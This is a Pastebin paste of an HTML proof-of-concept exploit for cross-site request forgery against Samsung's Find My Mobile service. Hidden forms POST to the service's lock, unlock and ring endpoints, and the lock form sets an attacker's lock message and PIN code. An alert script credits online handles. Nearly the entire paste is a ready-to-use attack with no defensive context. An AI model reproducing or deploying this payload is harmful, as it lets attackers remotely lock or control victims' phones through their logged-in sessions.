Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <h2>Samsung Account - Remote Mobile Device Lock CSRF VUlnerability</h2>
- <body><script>alert('Follow: @DosPerl')</script>
- <form action="http://findmymobile.samsung.com/dm/ajax/lockMyMobilePhone.do" method="POST">
- <input type="hidden" name="" value=""/>
- <input type="hidden" name="lockMessage" value="This Device has been Locked by @CrashBandicot" />
- <input type="hidden" name="nationalityNumber" value="+20" />
- <input type="hidden" name="restrictionNumber" value="my number phone" />
- <input type="hidden" name="pinCode" value="1088" />
- <input type="submit" value="Submit form" />
- </form>
- <h2>Samsung Account - Remote Mobile Device UnLock CSRF VUlnerability</h2>
- <form action="http://findmymobile.samsung.com/dm/ajax/lockreleaseMyMobilePhone.do" method="POST">
- <input type="submit" value="Submit form" />
- </form>
- <h2>Samsung Account - Remote Mobile Device Ring CSRF VUlnerability</h2>
- <form action="http://findmymobile.samsung.com/dm/ajax/ringMyMobilePhone.do" method="POST">
- <input type="hidden" name="" value=""/>
- <input type="hidden" name="message" value="Lost Device" />
- <input type="hidden" name="fmmVer" value="message" />
- <input type="submit" value="Submit form" />
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment